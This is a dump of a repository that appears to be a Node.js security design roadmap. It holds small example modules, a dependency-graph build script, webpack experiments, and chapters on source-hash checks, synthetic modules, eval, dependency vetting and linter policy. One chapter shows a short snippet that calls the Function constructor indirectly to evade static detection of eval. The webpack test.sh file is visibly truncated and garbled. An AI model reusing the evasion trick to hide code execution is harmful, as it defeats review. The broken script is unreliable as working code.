7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/dynamic.js
19 |
20 | exports.x = 'dynamic';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/lazy.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/lazy.js
19 |
20 | exports.x = 'lazy';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/opt2.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/opt2.js
19 |
20 | exports.x = 'opt2';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/static.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/static.js
19 |
20 | exports.x = 'static';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/make_dep_graph.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | set -e
18 |
19 | cd "$(dirname "$0")"
20 |
21 | mkdir -p graphs
22 | (
23 | echo 'digraph Modules {'
24 |
25 | # Run the tests and filter the logs for log entries from our
26 | # hacked Module._load.
27 | # Also relativize source file paths.
28 | NODE=/Users/msamuel/work/node/out/Release/node \
29 | PATH="/Users/msamuel/work/node/out/Release/:$PATH" \
30 | ./node_modules/.bin/mocha 2>&1 \
31 | | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'
32 |
33 | # Add an edge from package.json to the main module.
34 | echo ' "./package.json" -> "./index.js";'
35 | echo ' "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
36 | echo '}'
37 | ) > graphs/full.dot
38 |
39 | python -c '
40 | import re
41 | import sys
42 |
43 | EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
44 | GRAPH_END_RE = re.compile(r"^ *\}")
45 |
46 | edges = {}
47 | def add_edge(src, tgt):
48 | tgts = edges.get(src)
49 | if tgts is None:
50 | tgts = []
51 | edges[src] = tgts
52 | tgts.append(tgt)
53 |
54 | for line in sys.stdin:
55 | edges_match = EDGE_RE.match(line)
56 | if edges_match is not None:
57 | add_edge(edges_match.group(1), edges_match.group(2))
58 | continue
59 | elif GRAPH_END_RE.match(line):
60 | reachable = set()
61 | def find_reachable(src):
62 | if src not in reachable:
63 | reachable.add(src)
64 | for tgt in edges.get(src, ()):
65 | find_reachable(tgt)
66 | find_reachable("\"./package.json\"")
67 | reachable = list(reachable)
68 | reachable.sort()
69 | for src in reachable:
70 | for tgt in edges.get(src, ()):
71 | print " %s -> %s;" % (src, tgt)
72 | print line,
73 | ' < graphs/full.dot > graphs/filtered.dot
74 |
75 | for graph in full filtered; do
76 | dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
77 | done
78 |
79 | # Start walking from package.json
80 |
81 |
--------------------------------------------------------------------------------
/chapter-2/example/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dynamism-example",
3 | "private": true,
4 | "description": "Example code that shows dynamically walking the test graph",
5 | "main": "index.js",
6 | "scripts": {
7 | "test": "echo $NODE; ./node_modules/.bin/mocha"
8 | },
9 | "author": "Mike Samuel",
10 | "license": "Apache-2.0",
11 | "devDependencies": {
12 | "chai": ">=4.1.2",
13 | "mocha": ">=4.0.1"
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/chapter-2/example/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // test/test.js
19 |
20 | var expect = require("chai").expect;
21 | var app = require("../index");
22 |
23 | describe("My TestSuite", () => {
24 | describe("A test", () => {
25 | it("A unittest", () => {
26 | // Exercise the API
27 | app.lazyLoad();
28 | });
29 | });
30 | });
31 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/.gitignore:
--------------------------------------------------------------------------------
1 | dist
2 | node_modules
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/goodbye.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.say = x => console.log(`Goodbye, ${x}!`);
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/hello.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.say = x => console.log(`Hello, ${x}!`);
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | var metadata = require('./package.json');
19 | var greeting = require('./' + metadata.greeting);
20 |
21 | greeting.say('World');
22 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "webpack-compat-experiment",
3 | "description": "Figuring out how well webpack deals with dynamic loads",
4 | "version": "0.0.0",
5 | "main": "index.js",
6 | "dependencies": {},
7 | "scripts": {},
8 | "author": "Mike Samuel",
9 | "license": "Apache-2.0",
10 | "greeting": "hello",
11 | "devDependencies": {
12 | "webpack": "^3.10.0"
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test-utils.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.doSomethingScaryButItsOkInTest = function() {
19 | throw new Error('test-utils.js: NOT PRODUCTION CODE');
20 | };
21 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test.sh:
--------------------------------------------------------------------------------
1 | echo <&1 | grep -q 'Hello, World!'; then
43 | echo 'Ran ok'
44 | else
45 | echo 'Failed to bundle dependency'
46 | fi
47 |
48 | echo
49 | echo Looking for non production code
50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
51 | echo 'Webpack bundled test code in its minimal configuration'
52 | false
53 | fi
54 |
55 | # */
56 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | console.log('test/test.js: NOT PRODUCTION CODE');
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/webpack.config.js:
--------------------------------------------------------------------------------
1 | const path = require('path');
2 |
3 | module.exports = {
4 | output: {
5 | path: path.resolve('./dist'),
6 | filename: 'bundle.js',
7 | },
8 | entry: path.resolve('./index.js')
9 | };
10 |
--------------------------------------------------------------------------------
/chapter-2/source-contents.md:
--------------------------------------------------------------------------------
1 | # Source Content Checks
2 |
3 | The node runtime's module loader uses the `_compile` method to actually
4 | turn file content into code thus:
5 |
6 | ```js
7 | // Run the file contents in the correct scope or sandbox. Expose
8 | // the correct helper variables (require, module, exports) to
9 | // the file.
10 | // Returns exception, if any.
11 | Module.prototype._compile = function(content, filename) {
12 | content = internalModule.stripShebang(content);
13 |
14 | // create wrapper function
15 | var wrapper = Module.wrap(content);
16 |
17 | var compiledWrapper = vm.runInThisContext(wrapper, {
18 | ```
19 |
20 | At the top of that method body, we can check that the content
21 | is on a list of production sources.
22 |
23 | The entire process looks like:
24 |
25 | 1. Developer develops and tests their app iteratively as normal.
26 | 2. The developer generates a list of production sources via the
27 | dynamic bundling scheme outlined earlier, a static tool like
28 | webpack, or some combination.
29 | 3. The bundling tool generates a file with a cryptographic hash
30 | for each production source.
31 | We prefer hashing to checking paths for reasons that will become
32 | apparent later when we discuss `eval`.
33 | 4. A deploy script copies the bundle and the hashes to a production server.
34 | 5. The server startup script passes a flag to `node` or `npm start`
35 | telling the runtime where to look for the production source hashes.
36 | 6. The runtime reads the hashes and combines it with any hashes necessary
37 | to whitelist any `node` internal JavaScript files that might load
38 | via `require`.
39 | 7. When a call to `require(x)` reaches `Module.prototype.compile`
40 | it hashes `content` and checks that the hash is in the allowed set.
41 | If not, it logs that and, if not in report-only-mode,
42 | raises an exception.
43 | 8. Normal log collecting and monitoring communicates failures
44 | to the development team.
45 |
46 | This is similar to [Content-Security-Policy (CSP)][csp] but for
47 | server-side code. Like CSP, there is an intermediate step that might
48 | be useful between no enforcement and full enforcement:
49 | [report only mode][].
50 |
51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only
53 |
--------------------------------------------------------------------------------
/chapter-2/synthetic-modules.md:
--------------------------------------------------------------------------------
1 | # Statically eliminating `eval`
2 |
3 | Pug provides a flexible API to load Pug templates from `.pug` files
4 | that `eval`s the generated code ([code][pug-eval]),
5 | and a command line interface for precompiling Pug files.
6 |
7 | Let's ignore those and imagine ways to allow a Pug user to
8 | compile a Pug template that makes the static nature apparent
9 | even to an analysis which doesn't make assumptions about the
10 | contents of `.pug` files.
11 |
12 | ```js
13 | const pug = require('pug');
14 |
15 | exports.myTemplate = pug.lang`
16 | doctype html
17 | html
18 | head
19 | ...`;
20 | ```
21 |
22 | This code snippet uses a [tagged template literal][] to allow Pug
23 | template code to appear inline in a JavaScript file.
24 |
25 | Rather than loading a `.pug` file, we have declared it in JavaScript.
26 |
27 | Imagine further that `pug.lang` runs the compiler, but instead of
28 | using `new Function(...)` it uses some new module API
29 |
30 | ```js
31 | require.synthesize(generatedCode)
32 | ```
33 |
34 | which could manufacture a `Module` instance with the generated code and
35 | install the module into the cache with the input hash as its filename.
36 |
37 | When [bundling](bundling.md), we could dump the content of synthesized
38 | modules, and, when the bundle loads in production, pre-populate
39 | the module cache. When the `pug.lang` implementation asks the
40 | module loader to create a module with the content between
41 | `...` it would find a resolved module ready but not
42 | loaded. If a module is already in the cache, `Module` skips the
43 | additional content checks.
44 |
45 | The Node runtime function, `makeRequireFunction`
46 | ([code][makeRequireFunction]), defines a `require` for each module
47 | that loads modules with the current module as the parent. That would
48 | also have to define a module specific `require.synthesize` that does
49 | something like:
50 |
51 | ```js
52 | function synthesize(content) {
53 | content = String(content);
54 | // Hashing gives us a stable identifier so that we can associate
55 | // code inlined during bundling with that loaded in production.
56 | const hash = crypto
57 | .createHash('sha512')
58 | .update(content, 'utf8')
59 | .digest();
60 | // A name that communicates the source while being
61 | // unambiguous with any actual file.
62 | const filename = '/dev/null/synthetic/' + hash;
63 | // We scope the identifier so that it is clear in
64 | // debugging trace that the module is synthetic and
65 | // to avoid leading existing tools to conclude that
66 | // it is available via registry.npmjs.org.
67 | const id = '@node-internal-synthetic/' + hash;
68 | const cache = Module._cache;
69 | let syntheticModule = cache[filename];
70 | if (syntheticModule) {
71 | // TODO: updateChildren(mod, syntheticModule, true);
72 | } else {
73 | cache[filename] = syntheticModule = new Module(id, mod);
74 | syntheticModule.loaded = true;
75 | syntheticModule._compile(content, filename);
76 | }
77 | // TODO: dump the module if the command line flags specify
78 | // a synthetic_node_modules/ output directory.
79 | return syntheticModule;
80 | }
81 |
82 | require.synthesize = synthesize;
83 | ```
84 |
85 | Static analysis tools often benefit from having a whole program
86 | available. Humans can reason about external files, like `.pug` files,
87 | but static analysis tools often have to be unsound, or assume the
88 | worst. Synthetic modules may provide a way to move a large chunk of
89 | previously unanalyzable code into the domain of what static analysis
90 | tools can check.
91 |
92 | This scheme, might be more discoverable if code generator authors
93 | adopted some conventions:
94 |
95 | * If a module defines `exports.lang` it should be usable as a
96 | template tag.
97 | * If that same function is called with an option map instead
98 | of as a template tag function, then it should return a function
99 | to enable usages like
100 | ```js
101 | pug.lang(myPugOptionMap)`
102 | doctype html
103 | ...`
104 | ```
105 | * If the first line starts with some whitespace, all subsequent
106 | lines have that same whitespace as a prefix, and the language
107 | is whitespace-sensitive, then strip it before processing.
108 | This would allow indenting inline DSLs within a larger
109 | JavaScript program.
110 |
111 | We discuss template tag usability concerns in more detail later when
112 | discussing [library tweaks][library].
113 |
114 | This proposal has one major drawback: we still have to trust the code
115 | generator. Pug's code generator looks well structured, but reasoning
116 | about all the code produced by a code generator is harder than
117 | reasoning about one hand-written module. The [frozen realms][] proposal
118 | restricts code to a provided API like
119 | `vm.runInNewContext` aimed to. If Pug, for example, chose to load its
120 | code in a sandbox, then checking just the provided context would give
121 | us confidence about what generated code could do. In some cases, we
122 | might be able to move code generator outside the
123 | [*trusted computing base*][TCB].
124 |
125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
127 | [library]: ../chapter-7/libraries.md
128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base
131 |
--------------------------------------------------------------------------------
/chapter-2/what-about-eval.md:
--------------------------------------------------------------------------------
1 | # What about `eval`?
2 |
3 | Previously we've talked about how to control what code loads
4 | from the file system, but not what code loads from strings.
5 |
6 | The rest of this discussion uses the term "`eval`" to refer to any of
7 | the `eval` operator, the `eval` function, `new Function`,
8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
9 | and other operators that convert strings or bytes into code.
10 |
11 | Recall that it is difficult to prove that code
12 | [does not `eval`](../chapter-1/threat-RCE.md):
13 |
14 | ```js
15 | var x = {},
16 | a = 'constructor',
17 | b = 'constructor',
18 | s = 'console.log(s)';
19 | x[a][b](s)();
20 | ```
21 |
22 | Some node projects deploy with a tweaked node runtime that turns off
23 | some `eval` operators, but there are widely used npm modules that use
24 | them carefully. For example:
25 |
26 | * [Pug][] generates HTML from templates.
27 | * [Mathjs][] evaluates closed-form mathematical expressions.
28 |
29 | Both generate JavaScript code under the hood, which is dynamically
30 | parsed. Let's consider two use cases:
31 |
32 | * Pug's code generator is usually called with trusted inputs, e.g.
33 | `.pug` files authored by trusted developers.
34 | * Mathjs is often called with untrusted inputs. If a developer
35 | wanted to let a user generate an ad-hoc report without having to
36 | download data into a spreadsheet, they might use Mathjs to parse
37 | user-supplied arithmetic expressions ([docs][more_secure_eval])
38 | instead of trying to check that an input is safe to `eval` via
39 | `RegExp`s. It is not without risk ([advisory][adv552])
40 | though [^1].
41 |
42 | These two uses of code generators fall at either end of a spectrum.
43 | The uses of Pug seem static, all the information is available before
44 | we deploy. Our Mathjs use case is necessarily dynamic since the
45 | input is not available until a user is in the loop.
46 |
47 | Next we discuss ways to recognize and simplify the former, while
48 | double-checking the latter. On the client, we have no options between
49 | allowing implicit `eval` and banning all uses of `eval`. There are
50 | fewer compelling use cases on the client since it is harder to
51 | amortize code generation over multiple requests. On the server, use
52 | of `eval` in the presence of untrusted inputs still needs to be
53 | carefully vetted. We explore ways to programatically enforce vetting
54 | decisions short of a blanket ban, but turning off `eval` before
55 | accepting untrusted inputs is still the most reliable way to prevent
56 | attackers from using `eval` against you.
57 |
58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]
59 |
60 |
61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
62 | [Pug]: https://pugjs.org/
63 | [Mathjs]: http://mathjs.org/
64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
65 | [adv552]: https://nodesecurity.io/advisories/552
66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278
67 |
--------------------------------------------------------------------------------
/chapter-3/knowing_dependencies.md:
--------------------------------------------------------------------------------
1 | # Knowing your dependencies
2 |
3 | ## Background
4 |
5 | [`npmjs` search results][npmjs/node] have stats on download count and
6 | open issues and PRs.
7 |
8 |
9 |
10 | Each package page also links to the corresponding GitHub project
11 | which has links to the project's [pulse][github-pulse].
12 |
13 | Both of these give an idea of how popular the project is, and
14 | whether it's actively developed.
15 |
16 | On their Github pages, many projects proudly display
17 | [badges and shields][] indicating their continuous integration status,
18 | and other vital statistics.
19 |
20 | The Linux Core Infrastructure project espouses a set of
21 | [best practices badges][bpb] and define tiers for mature infrastructure
22 | projects. We get some of the basic items for free by distributing via
23 | `npm`, but other items bear on how responsive the project might be to
24 | vulnerability reports and how it might respond to attempts to inject
25 | malicious code:
26 |
27 | * Another will have the necessary access rights if someone dies
28 | * Monitor external dependencies to detect/fix known vulnerabilities
29 | * At least 2 unassociated significant contributors
30 | * Use 2FA
31 | * At least 50% of all modifications are reviewed by another
32 | * Have a security review (internal or external)
33 |
34 | "Use 2FA" is possible with npm but it is not clear that it is widely
35 | practiced. [MTP][] discusses the support already built into Github
36 | and `npm profile`.
37 |
38 |
39 | ## Problem
40 |
41 | Threats: [LQC][] [MTP][]
42 |
43 | The npm repository, like other open-source code repositories,
44 | contains mature and well-maintained modules, but also plenty of
45 | bleeding-edge code that has not yet had bugs ironed out.
46 |
47 | A wise technical lead might decide that they can use third-party
48 | dependencies that have been widely used in production for several
49 | years by projects with similar needs since gross errors are likely
50 | to have been fixed.
51 |
52 | That technical lead might also decide that they can use bleeding edge
53 | code when they have enough local expertise to vet it, identify
54 | corner-cases they need to check, and fix any gross errors they
55 | encounter.
56 |
57 | Either way, that decision to use bleeding-edge code or code that might
58 | not be maintained over the long term should be a conscious one.
59 |
60 |
61 | ## Success Criteria
62 |
63 | Development teams are rarely surprised when code that they had built a
64 | prototype on later turns out not to be ready for production use, and
65 | they do not have to pore over others' code to vet many dependencies.
66 |
67 | ## A Possible Solution
68 |
69 | The building blocks of a solution probably already exist.
70 |
71 | ### Aggregate more signals
72 |
73 | `npmjs.com` may or may not be the right place to do this, but we
74 | should, as a community, aggregate signals about modules and make
75 | them readily available.
76 |
77 | `npmjs.com/package` already aggregates some useful signals, but
78 | it or another forum could aggregate more including
79 |
80 | - More of the GitHub pulse information including
81 | closed issues, PRs over time.
82 | - Relevant badges & shields for the project itself.
83 | - Relevant badges & shields by percentage of transitive
84 | dependencies and peer dependencies that have them.
85 | - Support channels, e.g. slack & discord.
86 | - Vulnerability reports and the version they affect.
87 | See sources in ["When all else fails"][failing]
88 | - Weighted mean of age of production dependencies transitively.
89 | - Results of linters (see [oversight][]) run without respecting
90 | [inline ignore comments][eslint-ignore-line] and
91 | [file ignore directives][eslint-ignore-file].
92 |
93 | Users deciding whether to buy something from an online store or
94 | download a cellphone app from an app store have reviews
95 | and comments from other users. That members of the community take
96 | time to weigh in can be a useful signal, and the details can help
97 | clarify whether this module or an alternative might be better for a
98 | specific use.
99 |
100 | Large organizations who host [internal replicas][] may already have a
101 | lot of the opinion available internally, but aggregating that across
102 | clients can help smaller organizations and large organizations
103 | that are debating whether to dip their toe in.
104 |
105 |
106 | ### Leadership & Developer outreach
107 |
108 | The node runtime already [passes][CI-node] the Linux Foundation's best
109 | practices criteria, but could lead the way by explaining how a project
110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these
111 | criteria.
112 |
113 |
114 | [npmjs/node]: https://www.npmjs.com/package/node
115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
116 | [badges and shields]: https://github.com/badges/shields
117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge
118 | [internal replicas]: ../chapter-4/close_dependencies.md
119 | [failing]: ../chapter-6/failing.md
120 | [CRY]: ../chapter-1/threat-CRY.md
121 | [LQC]: ../chapter-1/threat-LQC.md
122 | [MTP]: ../chapter-1/threat-MTP.md
123 | [oversight]: ../chapter-5/oversight.md
124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js
127 |
--------------------------------------------------------------------------------
/chapter-5/oversight.md:
--------------------------------------------------------------------------------
1 | # Oversight
2 |
3 |
4 | ## Problem
5 |
6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]
7 |
8 | Manually reviewing third party modules for known security problems
9 | is time consuming.
10 |
11 | Having developers wait for such review unnecessarily slows down
12 | development.
13 |
14 | Our engineering processes ought not force us to choose between
15 | forgoing sanity checks and shipping code in a timely manner.
16 |
17 |
18 | ## Background
19 |
20 | [JSConformance][] allows a project team to specify a policy for
21 | Closure JavaScript. This policy can encode lessons learned about APIs
22 | that are prone to misuse. By taking into account type information
23 | about arguments and `this`-values it can distinguish problematic
24 | patterns like `setTimeout(aString, dt)` from unproblematic ones
25 | `setTimeout(aFunction, dt)`.
26 |
27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can
28 | be extended as a project or developer community identifies Good and
29 | Bad parts of JavaScript for their particular context.
30 |
31 |
32 |
33 | ## A possible solution
34 |
35 | ### Encode lessons learned by the community in linter policies
36 |
37 | Instead of having security specialists reviewing lots of code
38 | they should focus on improving tools.
39 | Some APIs and idioms are more prone to misuse than others, and some
40 | should be deprecated in favor of more robust ways of expressing the
41 | same idea. As the community reaches a rough consensus that a code
42 | pattern is prone to misuse or there is a more robust alternative, we
43 | could try to encode that knowledge in an automatable policy.
44 |
45 | Linters are not perfect. There are no sound production-quality static
46 | type systems for JavaScript, so its linters are also necessarily
47 | heuristic. TSLint typically has more fine-grained type information
48 | available than ESLint, so there are probably more anti-patterns that
49 | TSLint can identify with an acceptable false-positive rate than
50 | ESLint, but feedback about what can and can't be expressed in ESLint
51 | might give its maintainers useful feedback.
52 |
53 | Linters can reduce the burden on reviewers by enabling computer aided
54 | code review — helping reviewers focus on areas that use powerful
55 | APIs, and giving a sense of the kinds of problems to look out for.
56 |
57 | They can also give developers a sense of how controversial a review
58 | might be, and guide them in asking the right kinds of questions.
59 |
60 | Custom policies can also help educate developers about alternatives.
61 |
62 | The rule below specifies an anti-pattern for client-side JavaScript
63 | in machine-checkable form, assigns it a name, has a short summary that
64 | can appear in an error message, and a longer description or
65 | documentation URL that explains the reasoning behind the rule.
66 |
67 | It also documents a number of known exceptions to the rule, for
68 | example, APIs that wrap `document.write` to do additional checks.
69 |
70 | ```pb
71 | requirement: {
72 | rule_id: 'closure:documentWrite'
73 | type: BANNED_PROPERTY
74 | error_message: 'Using Document.prototype.write is not allowed. '
75 | 'Use goog.dom.safe.documentWrite instead.'
76 | ''
77 | 'Any content passed to write() will be automatically '
78 | 'evaluated in the DOM and therefore the assignment of '
79 | 'user-controlled, insufficiently sanitized or escaped '
80 | 'content can result in XSS vulnerabilities.'
81 | ''
82 | 'Document.prototype.write is bad for performance as it '
83 | 'forces document reparsing, has unpredictable semantics '
84 | 'and disallows many optimizations a browser may make. '
85 | 'It is almost never needed.'
86 | ''
87 | 'Exceptions allowed for:'
88 | '* writing to a completely new window such as a popup '
89 | ' or an iframe.'
90 | '* frame busting.'
91 | ''
92 | 'If you need to use it, use the type-safe '
93 | 'goog.dom.safe.documentWrite wrapper, or directly '
94 | 'render a Strict Soy template using '
95 | 'goog.soy.Renderer.prototype.renderElement (or similar).'
96 |
97 | value: 'Document.prototype.write'
98 | value: 'Document.prototype.writeln'
99 |
100 | # These uses have been determined to be safe by manual review.
101 | whitelist: 'javascript/closure/async/nexttick.js'
102 | whitelist: 'javascript/closure/base.js'
103 | whitelist: 'javascript/closure/dom/safe.js'
104 | }
105 | ```
106 |
107 | ----
108 |
109 | We propose a project that maintains a set of linter policies per language:
110 |
111 | * A **common** policy suitable for all projects that identifies
112 | anti-patterns that are generally regarded as bad practice by the
113 | community with a low false positive rate.
114 | * A **strict** policy suitable for projects that are willing to
115 | deal with some false positives in exchange for identifying more
116 | potential problems.
117 | * An **experimental** policy that projects that want to contribute to
118 | linter policy development can use.
119 | New rules go here first, so that rule maintainers can get feedback
120 | about their impact on real code.
121 |
122 |
123 | ### Decouple Reviews from Development
124 |
125 | Within a large organization, there are often multiple review cycles, some
126 | concurrent:
127 |
128 | - Reviews of designs and use cases where developers gather information
129 | from others.
130 | - Code reviewers critique pull requests for correctness, maintainability,
131 | testability.
132 | - Release candidate reviews where professional testers examine a
133 | partial system and try to break it.
134 | - Pre-launch reviews where legal, security & privacy, and other
135 | concerned parties come to understand the state of the system and
136 | weigh in on what they need to be able to support its deployment.
137 | - Limited releases where trusted users get to use an application.
138 |
139 | Reviews should happen early and late. When designing a system or a
140 | new feature, technical leads should engage specialists. Before
141 | shipping, they should circle back to double check the implementation.
142 | During rapid development though, developers should drive development
143 | — they may ask questions, and may receive feedback (solicited
144 | and not), but ought not have to halt work while they wait for reviews
145 | from specialists.
146 |
147 | Some changes have a higher security impact than other, so
148 | some will require review by security specialists, but not most.
149 |
150 | During an ongoing security review, security specialists can contribute
